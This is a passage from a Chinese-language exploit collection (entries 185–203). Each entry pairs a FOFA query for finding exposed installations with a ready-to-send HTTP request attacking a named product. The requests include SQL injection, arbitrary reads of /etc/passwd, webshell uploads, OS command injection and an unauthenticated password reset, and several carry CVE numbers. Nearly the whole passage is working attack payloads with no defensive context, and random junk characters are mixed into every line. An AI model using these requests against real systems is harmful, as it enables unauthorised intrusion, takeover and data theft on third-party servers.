, T! h/ c% W+ BFOFA:app="REALOR-天翼应用虚拟化系统": S' O z7 Y' M9 _% Z$ J: ]& h
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
9 \. C: K7 c" s j. `Host: host0 K) D2 Z" s* M6 j# \
+ r" Z8 n8 P1 f* m$ N- a: ^( O$ @! u: G1 ]2 c+ S V" {
186. F-logic DataCube3 SQL注入& j# \$ B. X1 Z" ^& M
CVE-2024-31750
# X& ?- O; v3 M8 D& e( f3 |F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
3 H- L) v. b2 B5 |: EFOFA:title=="DataCube3"
* n9 ~1 d8 A4 y: a+ i IPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1) X0 x8 a- L$ N. P6 U: h
Host: your-ip/ a2 w7 X3 {+ G2 J; n- i# h7 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
0 _, E1 i; G0 y: T6 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
' t3 F* P% z& PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 {; i; r* e7 a% a% E0 mAccept-Encoding: gzip, deflate- c, \7 b4 j5 q" O' G9 u
Connection: close7 u2 t0 r* R' k
Content-Type: application/x-www-form-urlencoded
9 h, i7 ^' \$ c! @! W2 L2 V6 j$ G2 T- v1 M5 q. O( l; u& }+ F. @
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450 z, J$ p/ [5 `, ], p7 Y
9 P) R' ]9 ~3 M: |+ k, o$ P4 |4 p g
187. Mura CMS processAsyncObject SQL注入
4 i7 j. n; x1 @CVE-2024-32640
! K$ N2 d3 m, u' b5 g0 n9 m; RFOFA:"Mura CMS"$ O5 K( \- J, ?) d* s5 o
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1; K/ f' O: c$ d0 v3 I
Host: your-ip
; ? ]: F( F5 |5 H# iContent-Type: application/x-www-form-urlencoded! T* V: Z. |- i# v3 {( V5 W
G" ?1 W9 P: P7 p0 C6 b) D# k) z1 ]2 y' l$ c6 q
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
/ n0 r1 C- R( \9 c/ \' i5 S/ ~2 w! _1 V8 T
2 i; I7 S3 t! j H188. 叁体-佳会视频会议 attachment 任意文件读取8 Q9 c6 s( j7 x+ u
version <= 3.9.7
: X; ?1 J9 R" {3 j6 NFOFA:body="/system/get_rtc_user_defined_info?site_id"
- x, ?. j- f- ~% |8 M" d( Y, NGET /attachment?file=/etc/passwd HTTP/1.1
0 C! t) u: O( d3 Q5 o0 mHost: your-ip
! ]* x* U7 d3 ]% |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* Q+ Y# l2 j3 t& [& E. E2 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 }! D& C; E3 [5 {( z5 ?
Accept-Encoding: gzip, deflate
5 Q1 C: A3 v' G' ]5 ^ _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
" Y3 `+ I; ~$ ]9 a8 ~Connection: close
4 O$ O4 ~3 L8 T) n0 G; c$ I& E" `3 D$ }! Q( G
/ p" s9 {- K7 J+ {. Q5 @& S189. 蓝网科技临床浏览系统 deleteStudy SQL注入; ^3 z# K y6 r7 x3 ^5 q7 o& v7 x4 M
FOFA:app="LANWON-临床浏览系统"
6 g3 h2 x5 `9 R% ? N3 VGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! j+ n% Q3 _) V1 B4 BHost: your-ip6 f8 F/ O" Q( M, A9 a
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.367 ? D( K/ C5 c! ~! L9 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) O1 f+ A- x, y1 l# z$ V. M
Accept-Encoding: gzip, deflate
- n+ u4 z* s- n1 y, S/ a- IAccept-Language: zh-CN,zh;q=0.9
% ?* d4 z, @9 a) w8 k; i: DConnection: close% A4 s6 F) P- F
, _# \* ~6 w) C" `
* J$ B$ V! _( ^/ E/ }5 b190. 短视频矩阵营销系统 poihuoqu 任意文件读取5 l6 m6 Z" n F9 T4 x" L$ Q |4 W
FOFA:title=="短视频矩阵营销系统"
# p/ t; X: n, g7 f3 A: M6 wPOST /index.php/admin/Userinfo/poihuoqu HTTP/2! n0 Y4 Y$ ^' ^+ V+ T9 u3 K
Host: your-ip
# A |0 w L3 M+ e9 Y+ S5 T# \" P# oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36- ?) c8 m/ D- ]: i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ V( Q2 s+ G3 e7 GContent-Type: application/x-www-form-urlencoded
N+ @! g! C' K3 D* w. MAccept-Encoding: gzip, deflate* Q" B6 F9 i5 _9 s$ N7 N
Accept-Language: zh-CN,zh;q=0.9; Q7 V$ C3 g+ h4 f2 j! P/ [
) Y+ U/ Z" k' y1 Xpoi=file:///etc/passwd
0 @7 _6 d- v. V. A4 |/ K
3 V& C' |2 U3 o- ^. Z; K6 ~) D
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
2 O: a# D& q+ n* CFOFA:body="/CDGServer3/index.jsp"3 G. d# x, C: i5 x7 F W- {3 G
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
d) m% |' h. Z2 Q8 }- K& I: m- lHost: your-ip4 S& u/ V: H$ S2 d. B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ a9 B' U5 P9 C! O6 s5 D7 KContent-Type: application/x-www-form-urlencoded
3 t. t. q1 W O0 D2 }: O
" e# t1 D V: W- ?command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
: z: h, t9 N, C5 ^( n# X* q/ X: h; n; L$ n9 r9 z
0 a1 P# O( P. g192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
+ |! ^ X: ^. T5 c! m0 H5 p' ~* j9 x) {FOFA:title="用户登录_富通天下外贸ERP"3 v1 C& l' l/ \7 Q5 C. d$ a! g& J
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1! k' ]4 `5 o: C, H7 R- M
Host: your-ip
0 z& A1 i+ `/ @& QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 z) w; s7 D3 V( W& H0 J5 sContent-Type: application/x-www-form-urlencoded, _0 M7 | a: F3 \9 v, i: R6 c
9 X1 E1 N9 u a, S) O
& R5 T+ H, g" a: V<% @ webhandler language="C#" class="AverageHandler" %># q2 B" A* H" x* p) }$ c' H* N; L; {
using System;7 g' L* z, O' {& a( S# M; F6 k
using System.Web;. e }8 z8 H, v. V- C. @4 p
public class AverageHandler : IHttpHandler! t1 a, o A8 L
{- L; d$ P; z. W4 C- I
public bool IsReusable
. o% V6 _) Z P{ get { return true; } }9 _+ s; Z+ V( @# R& f* n
public void ProcessRequest(HttpContext ctx)" W5 i/ M5 u5 e" `
{7 C5 G+ p* e& Y# t' d' J- g5 d4 _
ctx.Response.Write("test");5 y+ Z, E/ y0 c# i( P1 M8 a
}! t1 _6 [- w9 O
}' y) P; I) y* \2 P9 ]% _& H
! W& X5 t$ n0 L
& }, N2 h! P& G
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行- C/ q* h* m/ M+ S9 V/ S# H
FOFA:body="山石云鉴主机安全管理系统": v5 ]: A; T- V$ e, W/ O0 ?; A' X
GET /master/ajaxActions/getTokenAction.php HTTP/1.13 \3 d' p" N7 K& X8 G
Host:. S6 Q4 ^3 P' V. B' M
Cookie: PHPSESSID=2333333333333;
* n" l+ d' q# @, eContent-Type: application/x-www-form-urlencoded4 k- a, w. k4 A e# m
User-Agent: Mozilla/5.0
: s6 L, |9 ^( W$ d% j1 g! r; j- q% l3 T( e* X. Q& l
7 ?% x" i) R' O) T& P& }3 ?* N
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.11 x2 K3 C% L9 \; N/ _" d. y7 t
Host:/ t1 }* ?( D2 J+ h7 {9 D9 c* F8 ]7 ?1 }
User-Agent: Mozilla/5.0* t( `2 n0 K1 J6 S1 x# Z5 |! y
Accept-Encoding: gzip, deflate: D; z8 U# d7 N" \! e0 O
Accept: */*8 q8 N( o% l8 `9 {+ q( A% p
Connection: close
* }( Q( U O1 V2 ZCookie: PHPSESSID=2333333333333;3 H' m+ r [8 c
Content-Type: application/x-www-form-urlencoded, O1 H$ u- X; T! E$ V1 f0 y- |
Content-Length: 84- D7 s# p* H" [9 X3 n. k
9 e1 e) Q: S D3 T0 zparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')! M' c; V/ W7 U; v# ^
* Y, Q; d! w2 A% w8 I
9 v; D# R1 y8 o1 gGET /master/img/config HTTP/1.1
" p' Y% F, ?! t; U$ EHost:! W1 R8 v O4 a4 s
User-Agent: Mozilla/5.05 |! ]3 X G3 ^! f9 ?( ? r8 w- L; x
+ ^+ r" w5 g) E! b% M" b
. @* _# V$ ]$ Z, E0 p5 f' H194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传; \- ]: e6 u& r! R8 a
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在) x8 @4 z! \* Q Q
6 x# `9 h" d! p
POST /servlet/uploadAttachmentServlet HTTP/1.15 ^4 z5 j" W6 n9 d
Host: host& B# ?7 `3 n* B( f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
5 M0 E9 Q' L4 H1 v& V* ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 `4 {1 @+ n) p4 @# hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& c& E) N$ _. ]4 `! N
Accept-Encoding: gzip, deflate/ F) K' b* A n, O/ q
Connection: close
# B6 E, j2 A& eContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk/ \8 r4 R! s3 {; l" Q6 R6 p- }9 S$ j
------WebKitFormBoundaryKNt0t4vBe8cX9rZk: O& x( _' n& u% H$ F g8 C
! K. N) A) B& i2 E. c2 V$ D5 q
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"& v* \0 Z$ t5 `- R/ k2 O
Content-Type: text/plain. w6 Z {7 G8 _1 L m: R
<% out.println("hello");%>
6 _3 z+ [* ]9 B4 b. v; T& _------WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 @: v9 E/ i- B/ {, S* [Content-Disposition: form-data; name="json"$ ]/ u$ I# _6 u! I- K2 u) u
{"iq":{"query":{"UpdateType":"mail"}}}
9 l9 t! p1 e4 C; f3 ~- u------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
, _7 }# f) b0 w( Z' u% Q8 h4 b, l% e
* l; _0 m) B5 k: f, r/ @. U
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
9 d$ w0 ?- d C, `- T( rFOFA:title=="飞鱼星企业级智能上网行为管理系统
+ v' s) |, ]! W% K; B7 TPOST /send_order.cgi?parameter=operation HTTP/1.1& b9 m0 |* Q2 P1 I
Host: 127.0.0.13 {. a# U3 U- j4 J# u) F
Pragma: no-cache u) T; _1 \: [% e! C& }; n# g. q
Cache-Control: no-cache2 s$ w8 e0 K- ^; H, y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36/ r7 v* X( ?; A+ x8 R4 d! B9 v" Z) P
Accept: */*
1 H6 k$ X3 |" y% u6 L" E, pAccept-Encoding: gzip, deflate2 N* G1 _- w+ w+ j
Accept-Language: zh-CN,zh;q=0.94 U, Y1 D/ `7 M
Connection: close+ u1 _: u; d7 L& _' k
Content-Type: application/x-www-form-urlencoded
( M9 t" W7 q. b5 H) C/ b* J1 ^& Y* CContent-Length: 68& K) Y7 ]. C3 V0 V9 O
9 f- ^1 p1 \( D/ b; }
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}0 |: c1 D* B$ \; l( y" V: W
1 _0 v2 ]6 j: z2 y3 R# ]! s/ {+ F, z% U, k2 k1 X+ d2 D+ F# U
196. 河南省风速科技统一认证平台密码重置/ a+ d, j. v; Z& Z: Q( u
FOFA:body="/cas/themes/zbvc/js/jquery.min.js", C z( i2 T! o) h- R' g% Q: @' K
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1) M) d6 d2 y5 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 d7 _8 V+ L! ]' J% v7 m
Content-Type: application/json;charset=UTF-8: d2 p% r, N% N( \1 u2 ~
X-Requested-With: XMLHttpRequest n1 J# y. m: e. {$ b9 i
Host:0 H' Q1 z& m! S K9 o3 i0 B
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
5 L* E+ S0 o' z' c! iContent-Length: 45
: U; g) g/ R! x o5 B1 Z% pConnection: close
$ {6 \- z5 w x
6 b* ?2 m) x$ J+ I. a1 I{"xgh":"test","newPass":"test666","email":""}( S( w1 H" @1 }
* p( U4 X8 W' x) r0 ]. b: J; X7 S; |, n: b1 H `
1 A( d, _( z5 I
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入7 ?: H& Q7 e' U, r' z
FOFA:app="浙大恩特客户资源管理系统"
# _0 S5 N8 U, g! v7 CGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
1 q$ y$ ^1 j8 u8 E2 @! MHost:
" Z% c# g9 X5 @7 x* u, i; l `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
/ r7 @1 e" }/ _' s+ ?8 [Accept-Encoding: gzip, deflate
: n1 O: e5 k+ b$ ^0 u( GConnection: close
; _& v4 u6 M7 P" I. ~3 l7 L
a7 w3 v. `' z4 _+ J, N
W7 Q' s! @' l* g1 o3 |$ ], x4 o: ~3 i& k
198. 阿里云盘 WebDAV 命令注入/ n# m( j" e R. Q' h4 u K2 A
CVE-2024-29640
* {: F) u6 L1 L* \* t, eGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1& T7 C1 q+ L, j( r
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
( t$ c- L* }5 N! E' oAccept: */*
% U! ]" A& }4 \! Q7 i+ NAccept-Encoding: gzip, deflate/ B; {: R, V( J w$ n6 @2 E8 d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
l! A( I4 @% J8 BConnection: close3 G k2 D E( d+ ^6 A8 p0 B
- \: {3 n4 T. ^& B$ b- @8 y3 O V2 v
8 g, `& Q, C: z/ T) Y# @* t199. cockpit系统assetsmanager_upload接口 文件上传
( V2 V5 o* ]5 J: J$ n& [+ D+ Z& z w8 _4 n: e) c% L6 o, D
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:. k+ f' O+ F4 T
GET /auth/login?to=/ HTTP/1.1
; t- J& L/ C7 ^' u; K- H
, G1 J2 T& ~) J Y- @3 z9 N响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"* C: n, [. i% b+ X1 U
: E! [% ]4 L8 S4 e+ }* D
2.使用刚才上一步获取到的jwt获取cookie:
, R! h) i. v+ _" w% d* C% R$ Q4 R" @; }8 f! O
POST /auth/check HTTP/1.1; h, r$ j2 K' a2 Z1 s
Content-Type: application/json
; C3 ~" w' @3 D& ^# I- b
4 M+ X4 ^0 f* o! r{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
1 | O! I$ g0 I6 {2 @3 [# y6 H
! Y5 N1 m" H, J1 O0 [- p0 V9 r: {响应:200,返回值:2 a6 ]; F4 z; p* s! @3 [
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/8 t8 i0 K% W. a, w0 L
Fofa:title="Authenticate Please!". j+ q3 i4 X4 t% V _, H0 k7 m
POST /assetsmanager/upload HTTP/1.1
( e; C( i0 k" _7 F6 x- q* b) FContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3& `; D' i- _/ F# I) W* ~
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92) w, P* K# P; F" u U) \: {
) f! r$ H) }; P1 c; p4 k
-----------------------------36D28FBc36bd6feE7Fb3
& j4 R; l, N1 }+ ?3 [7 G1 IContent-Disposition: form-data; name="files[]"; filename="tttt.php") A& K! `2 D/ X2 @, m
Content-Type: text/php' O5 U6 U& v; }$ \$ l
+ B: I' }% c! r) C( j+ E @<?php echo "tttt";unlink(__FILE__);?>! D& Q* X# f5 U2 j% p) U) S
-----------------------------36D28FBc36bd6feE7Fb3
2 n M h, u9 m% [2 I4 o9 oContent-Disposition: form-data; name="folder", { b8 _# f* C N! M1 Y7 S
& [, F- u4 h* |9 i: J2 E2 g k! v! g-----------------------------36D28FBc36bd6feE7Fb3--0 V* L4 ]5 P$ d
; H8 o7 x$ a$ b+ V6 [1 p
5 R9 u) f2 X2 Z8 Z! X7 X/storage/uploads/tttt.php5 E: G1 ]# |* {5 U8 F% r/ d
( j2 n, c6 L3 y) b7 ~
200. SeaCMS海洋影视管理系统dmku SQL注入
! u& r- E l, T; x* lFOFA:app="海洋CMS"4 g: X7 J" w2 I+ ?4 Y" x, s
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
; r" L# t( H: s6 UCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
, j; w1 x1 v! PUpgrade-Insecure-Requests: 1
, c- N' [! y; Q( R3 ]& G4 c2 U+ FCache-Control: max-age=0
5 N. p+ q* A+ b8 O8 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 P' V1 `7 ?- {2 h4 o3 |% gAccept-Encoding: gzip, deflate9 ?; p \2 Q' P1 ~
Accept-Language: zh-CN,zh;q=0.9
- e, m. C! l: y( |
! N/ ?. L3 Y& I- s: }& Z$ R; L, P( O, p) U( e( h+ h. i
201. 方正全媒体新闻采编系统 binary SQL注入, p; E0 M0 Q! t8 k8 q
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"* e' o a& L/ h
POST /newsedit/newsplan/task/binary.do HTTP/1.1
c% B) q$ j! }# f6 Q, cContent-Type: application/x-www-form-urlencoded8 t7 @& ~# r! D d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 l. k2 R1 t/ v$ y3 P! E
Accept-Encoding: gzip, deflate L& c0 N) i2 |$ C3 v- Q
Accept-Language: zh-CN,zh;q=0.9
& w" U; r5 r' d7 P; @1 O9 m* k$ BConnection: close
) }2 F' @7 q" x$ M3 C
5 q, v, R! H3 b# |" G, ]" E0 VTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
$ F4 d9 f i4 \2 v8 _' R0 f! e6 H. i
9 T7 Y' Q+ }7 ~2 H) i9 M
202. 微擎系统 AccountEdit任意文件上传: H9 V8 T8 |7 M' d& h7 ~/ X5 N) g
FOFA:body="/Widgets/WidgetCollection/"
& V& h+ r. X# l F0 U获取__VIEWSTATE和__EVENTVALIDATION值: z* D' b) l& Q
GET /User/AccountEdit.aspx HTTP/1.1; u+ ~. e3 |/ R2 O4 S g* k
Host: 滑板人之家
% K: I. X/ V! k+ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31+ \* ?8 s9 m/ H9 F2 X- W# n
Content-Length: 09 P! h# M7 d: R8 q; L$ A
0 D. s) q3 `# n. o7 D Q9 O5 b& o8 s$ g" m; ?
替换__VIEWSTATE和__EVENTVALIDATION值( m' L: s& C' h, T
POST /User/AccountEdit.aspx HTTP/1.1( ]% {- D- n" C2 A0 }+ i
Accept-Encoding: gzip, deflate, br
' L% t- s$ F2 e& ?Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356874 a6 b6 A0 {6 V& J' J, H K
9 l" [" ~$ @" B$ |0 d/ T
-----------------------------786435874t38587593865736587346567358735687
9 l; k6 {# |* m9 R o' AContent-Disposition: form-data; name="__VIEWSTATE"( `- ]$ t$ e: P, W2 O
# ]' l; r% d0 e2 m; S7 U
__VIEWSTATE
) K: @# B/ J2 F-----------------------------786435874t38587593865736587346567358735687
1 F1 K" r! p; t# h( ~/ N2 gContent-Disposition: form-data; name="__EVENTVALIDATION"
4 Y5 i0 Q& W; b) ?$ j1 G1 E1 J& [0 w. ~& s" z& \
__EVENTVALIDATION! v0 U! u' u+ U
-----------------------------786435874t38587593865736587346567358735687) q( Z4 N/ H. b1 Z0 I$ G: _
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"8 \4 B' ]0 ~" M R6 R
Content-Type: text/plain) c# O; B, c4 T( {
' N* `( b# t1 j, `6 w% N. ^ aHello World!
0 o/ D2 m: {% L' L& z5 c-----------------------------786435874t38587593865736587346567358735687
; a1 M8 {" k5 g. q- Y+ Q" CContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"' c7 [- ] A, x1 v9 L, f
1 ]9 L' o' V( Z% x上传图片
9 q w$ O2 }: U% f0 O/ p-----------------------------786435874t38587593865736587346567358735687
0 \6 g1 ?; i6 C+ FContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"7 U( D4 I* D1 r& W3 s- c
4 m6 L1 s, u, |
/ ^( u6 }9 \& P/ T) w
-----------------------------786435874t38587593865736587346567358735687
& u6 A$ l% J9 QContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
! ^+ Y- N; B/ u+ ]% \2 h
! N$ l3 |- B I" @ f% Y( |! E* O
-----------------------------786435874t38587593865736587346567358735687--
* I1 }# Y+ |& s' {# v4 |. @2 Z- @3 g& j! x' Z
& W& H4 u+ ~, N& x$ A
/_data/Uploads/1123.txt% p7 ?4 l6 b$ i0 R9 X/ J0 K
: ?) v! S) a9 N7 R4 A5 v203. 红海云EHR PtFjk 文件上传
7 Y0 e& a- U6 l+ ZFOFA:body="RedseaPlatform" }$ L+ l7 a" {& O6 k, \" o" T
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
( d' C* b7 t$ T2 Y" rHost: x.x.x.x& q) ~) r9 R9 O- Y$ { l2 v/ F
Accept-Encoding: gzip2 v" K3 [$ c% |( Q+ R, B3 x' P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 k; A1 F4 T: S6 L1 h) z* l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
- M! I/ H5 A; vContent-Length: 210
: o7 A( G" T- S& N' L% Q* q( u. B J2 j* T1 X- C+ D4 p
------WebKitFormBoundaryt7WbDl1tXogoZys4: _+ g; j( A8 N2 Z/ l3 c
Content-Disposition: form-data; name="fj_file"; filename="11.jsp", K; t1 s8 T$ @
Content-Type:image/jpeg3 U" p: m& E( m" o5 w: @8 x5 m- o
% o" j2 A9 }5 I; m S3 w7 ^, k<% out.print("hello,eHR");%>
8 r, o! I/ G C) G------WebKitFormBoundaryt7WbDl1tXogoZys4--" i& p/ e% Y5 q7 x- X
! [- [6 K, A& _0 b% a1 p( V ! \! i4 V ], T
4 ^ z4 L: ^9 |) q. [0 c5 M$ l
( d' D% ]$ i& D- }2 ]) j/ \) ^( `. d8 ^7 c
; V9 M1 S4 h. T
|